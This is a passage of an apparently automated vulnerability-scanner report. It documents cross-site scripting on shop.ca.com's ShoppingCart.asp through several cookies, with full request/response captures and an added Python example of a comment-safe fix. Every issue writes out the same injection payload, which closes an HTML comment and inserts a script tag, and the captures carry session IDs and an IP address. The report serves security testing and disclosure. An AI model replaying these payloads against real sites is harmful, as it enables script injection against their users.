Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=13030469394523f4c2--><script>alert(1)</script>d1db291ccbd;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 13:04:52 GMT
Content-Length: 9505
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: DB=msRandX=93&msProduct=1782427&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&Survey=1&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/


<html>
<head>

<TITLE>shop.ca.com - Invalid Email</TITLE>
<meta name="Author" content="TigerDirect, Inc. Web Development Team">
<meta name="copyright" content=". 2003 TigerDirect, Inc. All righ
...[SNIP]...
<!--_clogin(e) :13030469394523f4c2--><script>alert(1)</script>d1db291ccbd-->
...[SNIP]...

4.306. http://shop.ca.com/cgi-bin/ShoppingCart.asp [Cart cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/ShoppingCart.asp

Issue detail

The value of the Cart cookie is copied into an HTML comment. The payload e871c--><script>alert(1)</script>9f31185eaa was submitted in the Cart cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/ShoppingCart.asp?msg= HTTP/1.1
Host: shop.ca.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Cart=Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=e871c--><script>alert(1)</script>9f31185eaa; SessionId=1310349220110417085445173193214243; SRCCODE=CAWEB; beta=Y; SRVR=WEBX140%2D01C; DB=msRandX=93&msProduct=1782427&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.1.10.1303044886

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 12:58:58 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 12:58:58 GMT
Connection: close
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHPromo=N&Referer=e871c%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9f31185eaa&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Content-Length: 15772

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--Cart(Referer) :e871c--><script>alert(1)</script>9f31185eaa-->
...[SNIP]...
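The Cart cookie in this issue is a classic-ASP "dictionary cookie" (`Cart=PHPromo=N&Referer=...&Landing=...`), and the echo `<!--Cart(Referer) :...-->` shows the application reading one sub-key. The Set-Cookie line in the response is instructive: the server percent-encodes the payload when it writes the cookie back (`Referer=e871c%2D%2D%3E%3Cscript...`), but that is transport encoding only; the next request decodes it to the same raw string and the debug comment prints it verbatim. The following is an added example in Python, not code from the report or from the shop.ca.com application, that parses both cookie values to show they carry the identical sub-value, and then shows the output-side fix the comment writer is missing. The constants are constructed from the Cookie and Set-Cookie lines above; the function names are this example's own.

```python
"""Added example: the ASP dictionary cookie from issue 4.306 and a comment-safe writer."""
from urllib.parse import parse_qsl

# Constructed from the Cookie and Set-Cookie lines of issue 4.306.
REQUEST_CART = (
    "Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp"
    "&Referer=e871c--><script>alert(1)</script>9f31185eaa"
)
RESPONSE_CART = (
    "PHPromo=N&Referer=e871c%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9f31185eaa"
    "&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp"
)


def parse_dict_cookie(value: str) -> dict:
    """Split a Cart=Key1=v1&Key2=v2 style value into its sub-keys.

    This is the shape classic ASP gives Request.Cookies("Cart")("Key") values:
    sub-values are percent-encoded for transport and decoded again on read,
    so encoding at the cookie layer does nothing for the HTML output layer.
    """
    return dict(parse_qsl(value, keep_blank_values=True))


def comment_safe(value: str) -> str:
    """Neutralise a value before placing it inside an HTML comment.

    A browser ends a comment at the first "-->" (or "--!>"). Entities are not
    decoded inside comments, so entity-encoding the whole string does not help
    by itself; what matters is that no ">" survives (no early close is then
    possible) and that "--" is broken up so the comment stays well formed.
    """
    return value.replace(">", "&gt;").replace("--", "-&#45;")


def render_debug_comment(label: str, value: str) -> str:
    """Write a cookie value into a debug comment without letting it close the comment."""
    return f"<!--{label} :{comment_safe(value)}-->"


if __name__ == "__main__":
    req, resp = parse_dict_cookie(REQUEST_CART), parse_dict_cookie(RESPONSE_CART)
    print("same Referer after round trip:", req["Referer"] == resp["Referer"])
    print(render_debug_comment("Cart(Referer)", req["Referer"]))
```

The comment-safe writer is a containment measure for the sink the report shows; the actual remediation is to stop emitting cookie values into production HTML at all, since the debug comments also leak the session identifier and geolocation data to anyone viewing the page source.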

4.307. http://shop.ca.com/cgi-bin/ShoppingCart.asp [CoreID6 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/ShoppingCart.asp

Issue detail

The value of the CoreID6 cookie is copied into an HTML comment. The payload 6f146--><script>alert(1)</script>9726ccbd6e was submitted in the CoreID6 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/ShoppingCart.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=6f146--><script>alert(1)</script>9726ccbd6e; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:38 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:38 GMT
Content-Length: 16116
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--CoreID6(818720507435:6f146--><script>alert(1)</script>9726ccbd6e-->
...[SNIP]...

4.308. http://shop.ca.com/cgi-bin/ShoppingCart.asp [DB cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/ShoppingCart.asp

Issue detail

The value of the DB cookie is copied into an HTML comment. The payload c3b06--><script>alert(1)</script>bf5167e6a07 was submitted in the DB cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/ShoppingCart.asp?msg= HTTP/1.1
Host: shop.ca.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Cart=Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; SessionId=1310349220110417085445173193214243; SRCCODE=CAWEB; beta=Y; SRVR=WEBX140%2D01C; DB=msRandX=93&msProduct=1782427&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpgc3b06--><script>alert(1)</script>bf5167e6a07; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.1.10.1303044886

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 12:58:58 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 12:58:58 GMT
Connection: close
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Content-Length: 15773

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--DB(msImageSC) :/microsoft/MSelasticity-bnr_620x150C.jpgc3b06--><script>alert(1)</script>bf5167e6a07-->
...[SNIP]...

4.309. http://shop.ca.com/cgi-bin/ShoppingCart.asp [IS3_GSV cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/ShoppingCart.asp

Issue detail

The value of the IS3_GSV cookie is copied into an HTML comment. The payload 375b3--><script>alert(1)</script>f7d3ee7a31 was submitted in the IS3_GSV cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/ShoppingCart.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com375b3--><script>alert(1)</script>f7d3ee7a31; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:38 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:39 GMT
Content-Length: 16116
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--IS3_GSV :DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com375b3--><script>alert(1)</script>f7d3ee7a31-->
...[SNIP]...

4.310. http://shop.ca.com/cgi-bin/ShoppingCart.asp [IS3_History cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/ShoppingCart.asp

Issue detail

The value of the IS3_History cookie is copied into an HTML comment. The payload 3142f--><script>alert(1)</script>9d6572aff29 was submitted in the IS3_History cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/ShoppingCart.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_03142f--><script>alert(1)</script>9d6572aff29; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:38 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:39 GMT
Content-Length: 16117
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--IS3_History :1301114230-2-91_0--2__0_03142f--><script>alert(1)</script>9d6572aff29-->
...[SNIP]...

4.311. http://shop.ca.com/cgi-bin/ShoppingCart.asp [SessionId cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/ShoppingCart.asp

Issue detail

The value of the SessionId cookie is copied into an HTML comment. The payload 6dfdb--><script>alert(1)</script>1eb17459348 was submitted in the SessionId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/ShoppingCart.asp?msg= HTTP/1.1
Host: shop.ca.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Cart=Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; SessionId=13103492201104170854451731932142436dfdb--><script>alert(1)</script>1eb17459348; SRCCODE=CAWEB; beta=Y; SRVR=WEBX140%2D01C; DB=msRandX=93&msProduct=1782427&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.1.10.1303044886

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 12:58:58 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 12:58:58 GMT
Connection: close
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Content-Length: 15773

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--SessionId :13103492201104170854451731932142436dfdb--><script>alert(1)</script>1eb17459348-->
...[SNIP]...

4.312. http://shop.ca.com/cgi-bin/ShoppingCart.asp [__utma cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/ShoppingCart.asp

Issue detail

The value of the __utma cookie is copied into an HTML comment. The payload add8f--><script>alert(1)</script>1dc24971d6e was submitted in the __utma cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/ShoppingCart.asp?msg= HTTP/1.1
Host: shop.ca.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Cart=Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; SessionId=1310349220110417085445173193214243; SRCCODE=CAWEB; beta=Y; SRVR=WEBX140%2D01C; DB=msRandX=93&msProduct=1782427&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=36441954.679833155.1303044886.1303044886.1303044886.1add8f--><script>alert(1)</script>1dc24971d6e; __utmc=36441954; __utmb=36441954.1.10.1303044886

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 12:59:00 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 12:59:00 GMT
Connection: close
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Content-Length: 15773

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--__utma :36441954.679833155.1303044886.1303044886.1303044886.1add8f--><script>alert(1)</script>1dc24971d6e-->
...[SNIP]...

4.313. http://shop.ca.com/cgi-bin/ShoppingCart.asp [__utmb cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/ShoppingCart.asp

Issue detail

The value of the __utmb cookie is copied into an HTML comment. The payload 91219--><script>alert(1)</script>0df6d14cc15 was submitted in the __utmb cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/ShoppingCart.asp?msg= HTTP/1.1
Host: shop.ca.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Cart=Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; SessionId=1310349220110417085445173193214243; SRCCODE=CAWEB; beta=Y; SRVR=WEBX140%2D01C; DB=msRandX=93&msProduct=1782427&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.1.10.130304488691219--><script>alert(1)</script>0df6d14cc15

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 12:59:02 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 12:59:01 GMT
Connection: close
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Content-Length: 15773

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--__utmb :36441954.1.10.130304488691219--><script>alert(1)</script>0df6d14cc15-->
...[SNIP]...

4.314. http://shop.ca.com/cgi-bin/ShoppingCart.asp [__utmc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/ShoppingCart.asp

Issue detail

The value of the __utmc cookie is copied into an HTML comment. The payload e5fe4--><script>alert(1)</script>4f7d177caa6 was submitted in the __utmc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/ShoppingCart.asp?msg= HTTP/1.1
Host: shop.ca.com
Proxy-Connection: keep-alive
